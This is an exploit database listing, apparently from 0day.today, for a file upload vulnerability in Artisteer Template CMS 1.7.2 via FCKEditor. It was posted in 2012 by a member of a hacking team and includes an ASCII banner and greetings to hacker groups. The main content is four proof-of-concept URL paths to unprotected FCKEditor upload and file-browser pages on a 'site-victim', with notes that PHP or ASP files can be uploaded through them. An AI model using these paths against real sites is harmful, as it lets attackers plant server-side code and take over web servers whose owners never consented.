[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Template CMS (FCKEditor) File Upload Vulnerability

Author
DoSs-Dz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17979
Category
web applications
Date add
05-04-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  [»] Site            : 1337day.com                                     0
1  [»] Support e-mail  : submit[@]1337day.com                            1
0                                                                        0
1               +---------------------------------------+                1
0               |I'm DoSs-Dz Member From Inj3ct0r Team  |                1
1               +---------------------------------------+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+----------------------------------------------------------------------------+
# Exploit Title : Artisteer Template CMS (FCKEditor)  File Upload
# Date :  05 April 2012
# Vendor Site : http://www.dotnetcmsportal.com/DownloadHandler.ashx?pg=f8b3f216-6730-4493-9e4c-f8f9b516af69&section=e72d6103-1025-47ac-8fc0-10cc404f52aa&file=172-Art-CMS.rar
# Version : 1.7.2
# Tested On : windows 7 professional
# Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] Upload Exploit P0C =» 
   
   ------------------------------------------------------------------------------------
   First poc is :
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/uploadtest.html    ---- > Uploaded File URL: your file link
   can you up php form or asp or asp.net
   ------------------------------------------------------------------------------------
   Second poc is : 
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/test.html  ---- > Uploaded File URL: your file link
   can you up php form or asp or asp.net
   ------------------------------------------------------------------------------------
   therd poc is :  
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/browser.html   ---- > see it
   ------------------------------------------------------------------------------------ 
   four poc is : 
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/frmupload.html   ---- > see it
   -------------------------------------------------------------------------------------- 
+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]       |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gheurrara on : 05 april 2012     |
+------------------------------------+ 



#  0day.today [2024-12-24]  #